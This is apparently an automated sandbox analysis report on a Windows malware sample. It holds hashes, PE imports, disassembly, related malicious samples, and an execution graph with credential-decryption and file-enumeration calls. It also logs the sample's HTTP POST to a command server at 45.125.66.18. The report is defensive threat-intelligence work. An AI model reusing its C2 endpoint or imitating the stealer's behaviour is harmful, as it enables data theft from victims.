EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 23
  • Number of non-executed functions: 5
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 20.42.65.92
  • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
No simulations
No context
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
TELE-ASTeleAsiaLimitedHKhttps://57365oo.cc/Get hashmaliciousPhisherBrowse
  • 45.125.65.213
zte.arm7.elfGet hashmaliciousUnknownBrowse
  • 45.125.66.78
Kxk45K3cAx.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 45.125.66.223
NVu6VqOPCN.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 45.125.66.223
4A4hEAVRnJ.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 45.125.66.223
Y6dJm8taZO.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 45.125.66.223
2Ipy5SuBUQ.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 45.125.66.223
KgIQ7WeeC1.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 45.125.66.223
V5f33oSsOM.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 45.125.66.223
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
72a589da586844d7f0818ce684948eea48DhuEoTcX.exeGet hashmaliciousMetasploit, MeterpreterBrowse
  • 45.125.66.18
6863(1)2.exeGet hashmaliciousCobaltStrikeBrowse
  • 45.125.66.18
20240730#U7cfb#U7edf#U5f02#U5e38#U62a5#U9519.exeGet hashmaliciousCobaltStrikeBrowse
  • 45.125.66.18
LisectAVT_2403002B_116.exeGet hashmaliciousUnknownBrowse
  • 45.125.66.18
LisectAVT_2403002B_116.exeGet hashmaliciousUnknownBrowse
  • 45.125.66.18
LisectAVT_2403002B_312.dllGet hashmaliciousTrickbotBrowse
  • 45.125.66.18
2new.dll.dllGet hashmaliciousCobaltStrikeBrowse
  • 45.125.66.18
havoc_x64.exeGet hashmaliciousHavocBrowse
  • 45.125.66.18
https.exeGet hashmaliciousMetasploitBrowse
  • 45.125.66.18
No context
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.9220300302118073
Encrypted:false
SSDEEP:192:WTFSAcJGOe0sGNmajRomzuiFJZ24IO8L:WMBJGOFsGNmajtzuiFJY4IO8L
MD5:0528FD5AC0A0E9ADF578BB8DCBDF6D2F
SHA1:0AE162C1959118B3937E4B49000CD31BA402FF63
SHA-256:0C6DFE52B84C1BA42C1204DC653A5A12558807BE07144A19E1B610F2DA8E0075
SHA-512:D632BB4092933CC564CB341DC08A4905F1635B04DA989EAFF1CF30A4EBE1859728E0184F2D93AF1DA7BA862F4BB6288B2BF41E62C53B5EABF5577B99C72A8790
Malicious:true
Reputation:low
Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.2.9.2.7.0.0.3.3.0.3.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.2.9.2.7.0.5.7.9.9.0.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.3.f.3.9.4.0.-.4.3.2.6.-.4.0.c.4.-.b.e.b.c.-.0.9.9.5.0.6.0.1.5.e.c.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.f.0.6.4.7.1.-.9.4.c.7.-.4.1.9.2.-.a.b.7.7.-.e.2.9.5.4.3.f.f.e.2.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.6.Z.s.D.c.g.x.4.N...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.f.c.-.0.0.0.1.-.0.0.1.4.-.b.8.d.8.-.5.a.8.d.6.e.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.4.6.f.e.a.b.9.6.5.9.d.6.7.7.f.c.d.2.a.8.5.5.5.7.b.8.3.1.9.7.3.0.0.0.0.f.f.f.f.!.0.0.0.0.9.2.f.a.5.f.8.f.3.4.6.c.b.9.8.7.f.2.4.9.b.d.4.1.7.5.5.c.5.a.e.d.a.f.4.c.8.6.4.6.!.V.6.Z.s.D.c.g.x.4.N...e.x.e.....T.a.r.g.e.t.A.p.p.
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 15 streams, Tue Aug 27 10:47:50 2024, 0x1205a4 type
Category:dropped
Size (bytes):1076012
Entropy (8bit):2.8258286923232547
Encrypted:false
SSDEEP:3072:ekCnrNi7ToQqoQNvxtyTvQihxF0uGNHZvpbZbLFIWot:ekCn6mNmTvQgfQ5DbLo
MD5:E120C73D7034082F3D53B4FF8DF9C167
SHA1:04530E47D3D825BB5FCFCB5D63C192F47D701476
SHA-256:9B4968E5AEF879A9B6353AE043302D7A1A2565155778CB37E4A7FAC055D62637
SHA-512:0A10998FE375ABEF438AFFE0BFB2EF9AD5B6593F3C09B596190A1DF5821A19C94E8085C61C0A1AFE77B07B2E07FD9CBDCF864A0BF1D7EA09BECA5D43C687EEE0
Malicious:false
Reputation:low
Preview:MDMP..a..... .........f........................l...(.......<...............bF..........`.......8...........T...........8H..."......................................................................................................eJ......T.......GenuineIntel............T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8364
Entropy (8bit):3.7057914601540154
Encrypted:false
SSDEEP:192:R6l7wVeJGF6g6YEIxSUGDggmfEJjm/hVpr789bMesfkEm:R6lXJU6g6YEOSUAggmfEJjm/hkMdfu
MD5:E326DC4FDCE9BFD26340C729CDE0C150
SHA1:CF3C6B79D7111042B100AE13ADED66F7079569FE
SHA-256:569ADDD92E9F43E71D7713306FB7F651B1A4343A82CF8EECD55A5D60B534D9BA
SHA-512:D84A0187D16D8A595993D69010DCE98578F3EF84F92B9A9AF200C664D8A47E04DEAD25CD0275FE1E15E4D80FD62F3B1C8CE07855D255A0775652BD6EE8914086
Malicious:false
Reputation:low
Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.5.6.<./.P.i.
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4635
Entropy (8bit):4.516314900825132
Encrypted:false
SSDEEP:48:cvIwWl8zsrJg77aI9r/oWpW8VYCYm8M4J0RyFq+q8Me65LD1Ud:uIjfFI75/B7V+JizV1Ud
MD5:93C3ABEA266E32F247339D33A56D86E9
SHA1:2BA61DD3344D6E8D6574F4F00F95704E2F193920
SHA-256:6D37F83E80CE951083C51592BE292EEBF12B2400564B49D73F184C95A2F92899
SHA-512:73216F6620C3C2F2560347025A82128C49DCFCC76E86830DA3CA2BB217A0C1C4D7854AD34EF025939C923CF885D9B54E710A7F2E33B66A75BA42856022993755
Malicious:false
Reputation:low
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473870" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.421565954184726
Encrypted:false
SSDEEP:6144:pSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNi0uhiTw:gvloTMW+EZMM6DFyo03w
MD5:5C5CB16DBDE73084B9CD80A3F001887C
SHA1:9AEF0246185C6D6D5F0C2A38968539105C6AFF3F
SHA-256:7E777A237D32B8C733165779754050734434288160D008305F0396C0482F529F
SHA-512:4EC26FDC90DCC5DD9B02B421626A936679A66A77A457359CB1B03FB2BCE0178FDD22E9640E1EF5DBED394BD41CB151D5F9C74F4CEBA7EF39BEA024ADD3FF50D6
Malicious:false
Reputation:low
Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm2...n................................................................................................................................................................................................................................................................................................................................................1..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):5.972409904582663
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:V6ZsDcgx4N.exe
File size:38'912 bytes
MD5:2d4e723c184d9403b078e53f2de74a23
SHA1:92fa5f8f346cb987f249bd41755c5aedaf4c8646
SHA256:0a6bf0678bbd793e39a84dfb4c71d8b709d9e538288bf826c48b1ba899803ba4
SHA512:a8f5267ae7f465a65a46d6abeaed0c7a910c349e708e4264cc68747ee26db78d62b575dedb2e64553c207b914ba240654930774954dfa7503c93393cfadce9ad
SSDEEP:768:ZCMmeyIJkkZ7XPImohfdjm7MEW/kJ7S/DWJ3GTHvvM1zI:ZCFeySkkJgl2MEW/ozwXM1
TLSH:6F032A01E841E03AFDE151FED3F706BD8E3C2F10132518DB06E5A5A9EB556E6B83086B
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................n.......................n.......n......Rich....................PE..L...PS.f...............&............0......
Icon Hash:00928e8e8686b000
Entrypoint:0x401d30
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x66CC5350 [Mon Aug 26 10:05:04 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:4576a725988be81bfee6ec0cabf5e869
Instruction
push ebp
mov ebp, esp
sub esp, 00000FD8h
push esi
push 0040B02Dh
push 00000000h
push 00000000h
call dword ptr [0040A01Ch]
mov dword ptr [ebp-04h], eax
cmp dword ptr [ebp-04h], 00000000h
je 00007FB030E4A73Fh
call dword ptr [0040A018h]
cmp eax, 000000B7h
jne 00007FB030E4A737h
jmp 00007FB030E4A819h
push 00000FC0h
push 00000000h
lea eax, dword ptr [ebp-00000FD8h]
push eax
call 00007FB030E4A9DEh
add esp, 0Ch
lea ecx, dword ptr [ebp-00000FD8h]
push ecx
call 00007FB030E4A64Fh
add esp, 04h
call 00007FB030E51B77h
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-24h], edx
lea edx, dword ptr [ebp-00000FD8h]
push edx
call 00007FB030E4BA55h
add esp, 04h
mov eax, 00000001h
test eax, eax
je 00007FB030E4A7ADh
mov dword ptr [ebp-18h], 00000001h
movzx ecx, byte ptr [ebp-20h]
test ecx, ecx
jne 00007FB030E4A78Eh
call 00007FB030E51B45h
mov ecx, eax
mov esi, edx
sub ecx, dword ptr [ebp-28h]
sbb esi, dword ptr [ebp-24h]
movzx eax, byte ptr [0040B06Ch]
cdq
mov dword ptr [ebp-0Ch], ecx
mov dword ptr [ebp-08h], esi
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-10h], edx
mov edx, dword ptr [ebp-08h]
cmp edx, dword ptr [ebp-10h]
jc 00007FB030E4A763h
jnbe 00007FB030E4A73Ah
mov eax, dword ptr [ebp-0Ch]
cmp eax, dword ptr [ebp-14h]
jc 00007FB030E4A759h
lea ecx, dword ptr [ebp-00000FD8h]
push ecx
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0xa61c0x8c.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000x258.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0xa5040x1c.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0xa0000x70.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x83800x8400cb1d32db83e69601384a9f1c2e69fe55False0.4835464015151515data5.999842112550039IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0xa0000x8d20xa008dd9a61cc343c3f7536605412f999393False0.43828125data4.315759737584478IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0xb0000x5440x20098f5f2ae72a99ac6ae2a0fb846c7af44False0.490234375data3.757947307933703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc0xc0000x2580x4005549773c51f762effe22df1a1b6c3181False0.5625data4.367976825968331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLLImport
KERNEL32.dllOpenProcess, ExitProcess, GetLastError, CreateMutexA, Sleep, GetCurrentProcess, TerminateThread, LocalAlloc, LocalFree, GetSystemInfo, GetModuleFileNameW, GetUserDefaultUILanguage, GetFileType, CloseHandle, CreateThread, DeleteFileW
USER32.dllGetSystemMetrics
ADVAPI32.dllCryptSignHashA
SHELL32.dllSHGetFolderPathW
CRYPT32.dllCryptUpdateProtectedState
WINHTTP.dllWinHttpTimeFromSystemTime
TimestampSource PortDest PortSource IPDest IP
Aug 27, 2024 12:47:48.152389050 CEST49704443192.168.2.545.125.66.18
Aug 27, 2024 12:47:48.152448893 CEST4434970445.125.66.18192.168.2.5
Aug 27, 2024 12:47:48.152520895 CEST49704443192.168.2.545.125.66.18
Aug 27, 2024 12:47:48.157084942 CEST49704443192.168.2.545.125.66.18
Aug 27, 2024 12:47:48.157116890 CEST4434970445.125.66.18192.168.2.5
Aug 27, 2024 12:47:48.890213966 CEST4434970445.125.66.18192.168.2.5
Aug 27, 2024 12:47:48.890316963 CEST49704443192.168.2.545.125.66.18
Aug 27, 2024 12:47:48.930354118 CEST49704443192.168.2.545.125.66.18
Aug 27, 2024 12:47:48.930372953 CEST4434970445.125.66.18192.168.2.5
Aug 27, 2024 12:47:48.931442976 CEST4434970445.125.66.18192.168.2.5
Aug 27, 2024 12:47:48.974436045 CEST49704443192.168.2.545.125.66.18
Aug 27, 2024 12:47:49.633585930 CEST49704443192.168.2.545.125.66.18
Aug 27, 2024 12:47:49.633622885 CEST49704443192.168.2.545.125.66.18
Aug 27, 2024 12:47:49.633650064 CEST4434970445.125.66.18192.168.2.5
Aug 27, 2024 12:47:49.964458942 CEST4434970445.125.66.18192.168.2.5
Aug 27, 2024 12:47:49.964478970 CEST4434970445.125.66.18192.168.2.5
Aug 27, 2024 12:47:49.964572906 CEST4434970445.125.66.18192.168.2.5
Aug 27, 2024 12:47:49.964595079 CEST49704443192.168.2.545.125.66.18
Aug 27, 2024 12:47:49.964623928 CEST49704443192.168.2.545.125.66.18
Aug 27, 2024 12:47:49.967385054 CEST49704443192.168.2.545.125.66.18
Aug 27, 2024 12:47:49.967406034 CEST4434970445.125.66.18192.168.2.5
Aug 27, 2024 12:47:49.967420101 CEST49704443192.168.2.545.125.66.18
Aug 27, 2024 12:47:49.967426062 CEST4434970445.125.66.18192.168.2.5
  • 45.125.66.18
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.54970445.125.66.184432556C:\Users\user\Desktop\V6ZsDcgx4N.exe
TimestampBytes transferredDirectionData
2024-08-27 10:47:49 UTC287OUTPOST /api/receiver/recv HTTP/1.1
Connection: Keep-Alive
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48
Content-Length: 3160
Host: 45.125.66.18
2024-08-27 10:47:49 UTC3160OUTData Raw: 00 7b 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: {a33c7340-61ca-11ee-8c18-806e6f6e6963}
2024-08-27 10:47:49 UTC231INHTTP/1.1 201 Created
Server: nginx/1.18.0
Date: Tue, 27 Aug 2024 10:47:49 GMT
Content-Type: application/octet-stream
Content-Length: 4230
Connection: close
X-Powered-By: Express
ETag: W/"1086-eeEIvwQRvsIx4B3isHTXuBfT8l0"
2024-08-27 10:47:49 UTC4230INData Raw: 01 03 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii:


Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:0
Start time:06:47:46
Start date:27/08/2024
Path:C:\Users\user\Desktop\V6ZsDcgx4N.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\V6ZsDcgx4N.exe"
Imagebase:0x190000
File size:38'912 bytes
MD5 hash:2D4E723C184D9403B078E53F2DE74A23
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:4
Start time:06:47:49
Start date:27/08/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 54484
Imagebase:0x8c0000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Reset < >

    Execution Graph

    Execution Coverage:19.6%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:13.3%
    Total number of Nodes:377
    Total number of Limit Nodes:12
    execution_graph 2931 19177a 2933 19174c 2931->2933 2932 1917e0 3 API calls 2932->2933 2933->2932 2934 1917b5 2933->2934 2496 191d30 CreateMutexA 2497 191d5f 2496->2497 2498 191d52 GetLastError 2496->2498 2498->2497 2499 191d64 2498->2499 2509 191ca0 2499->2509 2501 191d86 2520 1930c0 2501->2520 2503 191e27 2538 191c80 2503->2538 2504 191e17 Sleep 2506 191da0 2504->2506 2506->2503 2506->2504 2531 193c50 2506->2531 2507 191e33 CloseHandle ExitProcess 2545 1916e0 2509->2545 2512 191cce ExitProcess 2516 191cba 2516->2512 2566 192810 2516->2566 2519 191cd6 2519->2501 2859 191470 2520->2859 2522 1930ce 2878 191ea0 RtlAllocateHeap 2522->2878 2524 1930db 2525 1931a1 2524->2525 2526 198b90 GetCurrentHwProfileA 2524->2526 2525->2506 2527 193112 2526->2527 2879 1931b0 2527->2879 2529 193147 2530 192b10 3 API calls 2529->2530 2530->2525 2907 191ea0 RtlAllocateHeap 2531->2907 2533 193d1a 2533->2506 2534 193c63 2534->2533 2535 198b90 GetCurrentHwProfileA 2534->2535 2536 193c9a 2535->2536 2537 192b10 3 API calls 2536->2537 2537->2533 2908 1929e0 2538->2908 2540 191c8c 2914 193ee0 2540->2914 2544 191c99 2544->2507 2571 191c40 2545->2571 2549 1916f0 2550 1916f4 2549->2550 2578 1917e0 2549->2578 2550->2512 2554 191e50 HeapCreate 2550->2554 2552 19170b 2552->2550 2553 1917e0 3 API calls 2552->2553 2553->2552 2555 191cb1 2554->2555 2555->2512 2556 193d50 2555->2556 2586 193ef0 VirtualAlloc 2556->2586 2559 193d68 2590 1943e0 2559->2590 2560 193d74 2597 191ea0 RtlAllocateHeap 2560->2597 2562 193d6d 2562->2516 2564 193d82 2598 191ee0 2564->2598 2567 192848 2566->2567 2568 1928c5 CreateThread 2567->2568 2570 191cc7 2567->2570 2569 1928eb CreateThread 2568->2569 2568->2570 2607 192db0 2568->2607 2569->2570 2601 192e60 2569->2601 2570->2512 2570->2519 2572 1916eb 2571->2572 2573 191c47 CryptUpdateProtectedState WinHttpTimeFromSystemTime 2571->2573 2575 191a40 2572->2575 2573->2572 2585 191a20 GetPEB 2575->2585 2577 191a55 2577->2549 2580 191845 2578->2580 2579 1918e8 2579->2552 2581 1918a2 GlobalHandle 2580->2581 2582 19188c 2580->2582 2581->2580 2582->2579 2583 1919f7 LoadLibraryA GetProcAddress 2582->2583 2584 1919f1 2582->2584 2583->2579 2584->2583 2585->2577 2587 193d5b 2586->2587 2588 193f16 VirtualAlloc 2586->2588 2587->2559 2587->2560 2588->2587 2589 193f39 VirtualAlloc 2588->2589 2589->2587 2591 1943ec VirtualFree 2590->2591 2592 1943ff 2590->2592 2591->2592 2593 194408 VirtualFree 2592->2593 2594 19441c 2592->2594 2593->2594 2595 194439 2594->2595 2596 194425 VirtualFree 2594->2596 2595->2562 2596->2595 2597->2564 2599 191ef1 RtlFreeHeap 2598->2599 2600 191f07 2598->2600 2599->2600 2600->2562 2606 192e6d 2601->2606 2602 1930af 2603 19309f Sleep 2603->2606 2606->2602 2606->2603 2613 191ea0 RtlAllocateHeap 2606->2613 2614 192920 2606->2614 2608 192db4 2607->2608 2609 192e4c 2608->2609 2610 192e3c Sleep 2608->2610 2612 192920 RtlFreeHeap 2608->2612 2622 192590 2608->2622 2610->2608 2612->2608 2613->2606 2615 192935 2614->2615 2621 1929ca 2614->2621 2616 191ee0 RtlFreeHeap 2615->2616 2617 192949 2616->2617 2618 191ee0 RtlFreeHeap 2617->2618 2619 192960 2618->2619 2620 191ee0 RtlFreeHeap 2619->2620 2620->2621 2621->2606 2624 19259c 2622->2624 2623 1925a2 2623->2608 2624->2623 2625 192629 2624->2625 2626 1926ba 2624->2626 2645 191ea0 RtlAllocateHeap 2625->2645 2627 19275d 2626->2627 2628 1926cc 2626->2628 2641 192692 2627->2641 2663 191ea0 RtlAllocateHeap 2627->2663 2655 191ea0 RtlAllocateHeap 2628->2655 2631 192648 2646 191060 2631->2646 2633 1926eb 2656 1912f0 2633->2656 2634 19278e 2664 191000 CryptUnprotectData 2634->2664 2638 191ee0 RtlFreeHeap 2638->2641 2643 191ee0 RtlFreeHeap 2643->2641 2644 191ee0 RtlFreeHeap 2644->2641 2645->2631 2647 191085 SHGetFolderPathW 2646->2647 2648 1910a4 2646->2648 2647->2648 2668 198d40 2648->2668 2651 1910f3 2651->2638 2653 1910da 2684 192b10 2653->2684 2655->2633 2657 191327 2656->2657 2658 191307 SHGetFolderPathW 2656->2658 2659 198d40 11 API calls 2657->2659 2658->2657 2660 19134c 2659->2660 2661 191366 2660->2661 2818 193a20 2660->2818 2661->2643 2663->2634 2665 19103d 2664->2665 2666 19104e 2664->2666 2847 1932a0 2665->2847 2666->2644 2694 191ea0 RtlAllocateHeap 2668->2694 2670 198d53 2671 1910c8 2670->2671 2695 192360 2670->2695 2671->2651 2683 191ec0 RtlSizeHeap 2671->2683 2674 198ec9 2676 191ee0 RtlFreeHeap 2674->2676 2675 198d95 2675->2674 2677 198ea6 FindNextFileW 2675->2677 2678 192360 2 API calls 2675->2678 2680 198d40 8 API calls 2675->2680 2700 191110 2675->2700 2713 191380 2675->2713 2676->2671 2677->2675 2679 198ebf FindClose 2677->2679 2678->2675 2679->2674 2680->2675 2683->2653 2811 192a60 2684->2811 2688 192b2d 2689 192b4f 2688->2689 2690 192bb0 2688->2690 2692 191ee0 RtlFreeHeap 2689->2692 2691 192920 RtlFreeHeap 2690->2691 2693 192b99 2691->2693 2692->2693 2693->2651 2694->2670 2698 192372 2695->2698 2696 192570 FindFirstFileW 2696->2675 2698->2696 2699 191ee0 RtlFreeHeap 2698->2699 2722 191ea0 